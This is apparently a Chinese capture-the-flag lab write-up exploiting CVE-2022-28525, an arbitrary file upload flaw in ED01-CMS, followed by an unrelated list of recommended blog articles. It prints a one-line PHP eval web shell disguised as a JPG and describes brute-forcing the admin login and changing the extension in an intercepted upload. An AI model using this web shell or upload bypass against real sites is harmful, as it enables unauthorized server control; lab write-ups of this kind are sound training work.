春秋云境 | 文件上传 | CVE-2022-28525

目录

靶标介绍

开启靶场

蚁剑连接

[获取 flag](#获取 flag)


靶标介绍

ED01-CMS v20180505 存在任意文件上传漏洞

开启靶场

发现了一个登录功能,使用 burp 爆破一下

爆破之后得到账号是 admin 密码是 admin,登录后是这样的页面

在左边的菜单栏挨着一个一个找,发现这个地方可以编辑用户的信息,可以修改头像上传头像

构造一个一句话木马,重命名为 1.jpg

复制代码
1.jpg:
<?php @eval($_POST[cmd]);?>

勾选 new image,上传 1.jpg, 然后抓包,修改后缀为 php,然后放包

放包之后,发现上传成功,右击复制图片链接

蚁剑连接

在根目录发现了 flag

获取 flag

相关推荐
IT小白杨1 小时前
2026Shopee多站点运营的浏览器隔离与移动端云手机方案
经验分享·社交电子·webgl·安全架构·指纹浏览器
上海广测检测科技有限公司1 小时前
鼠标CCC认证技术解读:适用标准与测试项目分析
经验分享
AI_CPU_GPU_Cloud1 小时前
2026电子会计档案系统排名?浪潮、鼎捷、用友、金蝶、数凭横向比较
经验分享
数据知道2 小时前
SSTI 模板注入:Jinja2 沙箱逃逸实战
网络·安全·网络安全
Fnetlink12 小时前
Fnet 云网安 260810
网络·安全·web安全
飞飞传输2 小时前
海关行业FTP传输服务器评测:传统FTP与现代化替代方案对比
大数据·运维·安全
Safeploy安策数据2 小时前
网络保密机如何部署?破解敏感数据跨域流转安全难题
网络·安全
蓝田~2 小时前
AI Demo到上线有多远?→ 安全纵深防御+Token成本精确计算+可观测性,PrismAI三周工程化复盘
人工智能·安全
互联网中的一颗神经元12 小时前
04 — 安全撤销:改错了怎么退回去
大数据·安全·elasticsearch
上海广测检测科技有限公司12 小时前
打印机CCC认证详解:产品范围界定与安全及电磁兼容测试要求解读
经验分享